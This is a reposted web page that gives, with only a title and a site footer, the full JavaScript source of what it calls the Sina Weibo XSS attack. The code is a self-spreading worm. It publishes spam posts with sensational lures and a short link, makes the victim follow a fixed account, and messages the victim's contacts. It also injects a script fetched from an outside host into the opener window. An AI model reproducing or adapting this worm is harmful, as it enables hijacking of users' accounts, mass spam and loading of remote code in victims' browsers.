新浪微博XSS攻击源代码

 function createXHR() {
    return window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
}

 function post(url, data, sync) {
    xmlHttp = createXHR();
    xmlHttp.open("POST", url, sync);
    xmlHttp.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xmlHttp.send(data);
}

 function getappkey(url) {
    xmlHttp = createXHR();
    xmlHttp.open("GET", url, false);
    xmlHttp.send();
    result = xmlHttp.responseText;
    id_arr = '';
    id = result.match(/namecard="true" title="[^"]*/g);
    for (i = 0; i < id.length; i++) {
        sum = id[i].toString().split('"')[3];
        id_arr += sum + '||';
    }
    return id_arr;
}

 function random_msg() {
    link = ' http://163.fm/PxZHoxn?id=' + new Date().getTime();;
    var msgs = [ '让女人心动的100句诗歌:', '3D肉团团高清普通话版种子:', '这是传说中的神仙眷侣啊:', '惊爆!范冰冰艳照真流出了:', '杨幂被爆多次被潜规则:', '傻仔拿锤子去抢银行:', '可以监听别人手机的软件:', '个税起征点有望提到4000:'];
    var msg = msgs[Math.floor(Math.random() * msgs.length)] + link;
    msg = encodeURIComponent(msg);
    return msg;
}

 function publish() {
    url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime();
    data = 'content=' + random_msg() + '&pic=&styleid=2&retcode=';
    post(url, data, true);
}

 function follow() {
    url = 'http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd=' + new Date().getTime();
    data = 'uid=' + 2201270010 + '&fromuid=' + $CONFIG.$uid + '&refer_sort=profile&atnId=profile';
    post(url, data, true);
}

 function message() {
    url = 'http://weibo.com/' + $CONFIG.$uid + '/follow';
    ids = getappkey(url);
    id = ids.split('||');
    for (i = 0; i < id.length - 1 & i < 5; i++) {
        msgurl = 'http://weibo.com/message/addmsg.php?rnd=' + new Date().getTime();
        msg = random_msg();
        msg = encodeURIComponent(msg);
        user = encodeURIComponent(encodeURIComponent(id[i]));
        data = 'content=' + msg + '&name=' + user + '&retcode=';
        post(msgurl, data, false);
    }
}

 function main() {
    try {
        publish();
    }
    catch (e) {}
    try {
        follow();
    }
    catch (e) {}
    try {
        message();
    }
    catch (e) {}
}
try {
    x = "g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";
    window.opener.eval(x);
}
catch (e) {}
main();
var t = setTimeout('location="http://weibo.com/pub/topic";', 5000);

本文链接 http://tec.5lulu.com/code/w8n6hbw2tj8ib0.html

我来评分 :6
0

转载注明:转自5lulu技术库

本站遵循:署名-非商业性使用-禁止演绎 3.0 共享协议

www.5lulu.com